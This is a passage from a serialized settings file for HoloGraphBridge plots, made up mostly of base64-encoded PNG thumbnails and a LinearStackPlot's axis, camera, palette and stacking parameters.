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', 'TitleSize': 1, 'TransitionIndex': 0}, {'$type': 'HoloGraphBridge.Plots.LinearStackPlot, HoloGraphBridge', 'AxesDivisions': [15, 5, 92], 'AxesDivisionsAuto': [False, False, False], 'AxesEdgesShow': [True, True, True], 'AxesGridlinesShow': [True, True, True], 'AxesLabelsOrientation': [1, 1, 1], 'AxesLabelsShow': [True, True, True], 'AxesLabelsSize': [0.09, 0.39, 0.19], 'AxesTicksShow': [False, False, False], 'AxesTitleSize': [0.5, 0.5, 0.5], 'PositionFill': [False, False, False], 'PositionIndex': [2, -1, 18], 'PositionRescale': [False, False, False], 'PositionReverse': [False, False, False], 'PositionScale': [1, 12.4, 1], 'StackBuckets': [127, 0, 34], 'StackBucketsAuto': [False, True, True], 'StackBucketsFill': [False, False, False], 'StackGroup': False, 'StackOrderAuto': True, 'StackOrderIndex': 42, 'StackOrderReverse': False, 'StackRescale': False, 'StackSpacing': [0, 1, 0], 'StackSpacingAuto': [False, False, False], 'StackSumIndex': -1, 'StackWidth': [1, 1, 17], 'StackWidthAuto': [False, False, True], 'CameraRotation': [0, 0, 0, 1], 'CameraTranslation': [0, 0, 0], 'ColorFill': False, 'ColorIndex': 42, 'Filter': -1, 'LabelColumns': [{'Index': 26, 'Name': False, 'Units': False}, {'Index': 35, 'Name': False, 'Units': False}], 'Layers': [], 'ManipulationRotation': [True, True, True], 'ManipulationScale': True, 'ManipulationTranslation': [True, True, True], 'ModelRotation': [-0.14731204509735107, -0.58852219581604, -0.0937739759683609, 0.7893977761268616], 'ModelScale': 4, 'ModelTranslation': [0, 0, 0], 'OrderIndex': 0, 'PaletteColors': [242, 27, 63, 255, 41, 191, 18, 255], 'PaletteDivisions': 2, 'PaletteDivisionsAuto': True, 'PaletteReverse': False, 'Selection': -1, 'Table': 0, 'TextSize': 0.5, 'TextWidth': 5, 'Thumbnail': 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAQAAAAEACAYAAABccqhmAAAgAElEQVR4Xu2dB5icVdXHz8zW1N1NJYX0QhWQLkj7wALYQYqoEFCa9C4iUgQ+ioAgVZogKoLSi3wiNlQEFCQJpEEKCSmkb7J15nt+dz2TszfvzLyzJbubufd5eMjO2+49957/Pf0mRCQtoQUKBAoUJQUSAQCKct7DoAMFHAUCAISFEChQxBQIAFDEkx+GHigQACCsgUCBIqZAAIAinvww9ECBAABhDQQKFDEFAgAU8eSHoQcKBAAIayBQoIgpEACgiCc/DD1QIABAWAOBAkVMgQAARTz5YeiBAgEAwhoIFChiCgQAKOLJD0MPFAgAENZAoEARUyAAQBFPfhh6oEAAgLAGAgWKmAIBAIp48sPQAwUCAIQ1EChQxBQIAFDEkx+GHigQACCsgUCBIqZAAIAinvww9ECBAABhDQQKFDEFAgAU8eSHoQcKBAAIayBQoIgpEACgiCc/DD1QIABAWAOBAkVMgQAARTz5YeiBAgEAwhoIFChiCgQAKOLJD0MPFAgAENZAoEARUyAAQBFPfhh6oEAAgLAGAgWKmAIBAIp48sPQAwUCAIQ1EChQxBQIAFDEkx+GHigQACCsgUCBIqZAAIAinvww9ECBAABhDQQKFDEFAgAU8eSHoQcKBAAIayBQoIgpEACgiCc/DD1QIABAWAOBAkVMgQAARTz5YeiBAgEAwhoIFChiCgQAKOLJD0MPFAgAENZAoEARUyAAQBFPfhh6oEAAgLAGAgWKmAIBAIp48sPQAwUCAIQ1EChQxBQIAFDEkx+GHigQACCsgUCBIqZAAIAinvww9ECBAABhDQQKFDEFAgAU8eSHoQcKBAAIayBQoIgpEACgiCc/DD1QIABAWAOBAkVMgQAARTz5YeiBAgEAwhoIFChiCgQAKOLJD0MPFAgAENZAoEARUyAAQBFPfhh6oEAAgLAGAgWKmAIBAIp48sPQAwUCAIQ1EChQxBQIAFDEkx+GHigQACCsgUCBIqZAAIAinvww9ECBAABhDQQKFDEFAgAU8eSHoQcKBAAIayBQoIgpEACgm0/+97//fRk6dKiceuqp3bynoXs9kQIBALrxrKXTaUkkmCKRZcuWyaBBgySZTMonPvEJ+ctf/tKq59XV1bJy5crI0fTp00fOPvtsueKKK7rxaEPXuoICAQC6guoxvwkA0E466SS588473b8tKDQ0NEhjY6P07t07AxT//Oc/ZbfddpP58+fLyJEjY34p3m1vvPGGfPzjH493c7irR1AgAEA3nyYkgFQq5XZ+mN8CgP476rd77rlH/vznP8v999+feWafffaRP/zhD/LDH/5QLrnkkgxoKNA0NTVJWVlZJEVOP/102W677eSBBx6Qv/71rwVTbf369VJZWemee//992XChAnS3Nxc8HvCAx1LgQAAHUvPDnsbTAkTAwDHHXecA4AvfvGLMmzYMLn99ttbAYF+tLS0VBYuXChDhgxpdb2+vl4qKiockJSUlEQCyaWXXiqXX3551v7DrFdffbVTI+rq6lqBB33kvY899pjrY1SzIIVKsnbt2sw7OoJoRx99tPzmN79xfQstPgUCAMSnVbe5E0b/9a9/Le+++6586lOfkp122skx0+zZs+VjH/uY1NbWZgDgueeek4suukj+/e9/Z3476KCDnFrxla98JTMmfvvd736XlSmjpAweBhgAF1QRtVdkAwCAC9vFQw89JG+//bbrq6o13/zmN510wbtQbWiABGDx0UcfOfsHDfsHqgiMDigCavoO+33b324zcd2wIwEAuuGk5OuSqgV6n6oH+Z7T64jfs2bNcn9OmTLFSRowDO/J1rgO8CxYsECuv/56ueGGG9ytl112meCpyMX8qBUwNfdcddVVcthhh8mkSZPc8wCI/e7rr78uu+yyiwwfPlw++OAD902rKtCP8vJyBzjZQElVmtdee0123XXXuGQpyvsCABTltLdt0DU1NbJ69eqNdPdHHnlEvvrVr2Z9KZIFDWlFwUsBA2ZFfWAnHzhwoNvttbHrv/POO+53e3++fyM5YOdAZQktNwUCAIQV0mYKwLTsztkMh9lePHr0aJk7d27mMjYKdnWkkfvuu8/9jhqzdOlSp5Z861vfagUAqAkvvPCC7LffflmBAbDK5hZt84A3wwcDAGyGk7o5D4ndf6+99nK2BIKjfvKTn8j+++8vN998c8amoLaDXGrJ5kyjQsYWAKAQavXQe88555yMzt5DhxC63UkUCADQSYTtLq/93Oc+5/Tzr3/9606kRq9mZ/zOd77jLPEvv/yyHH744fLggw86Pz2xABjeQisOCgQAKHCe0T/RWXtKI48Ad99tt93m+n3++ec7cZlYgcWLF0v//v1l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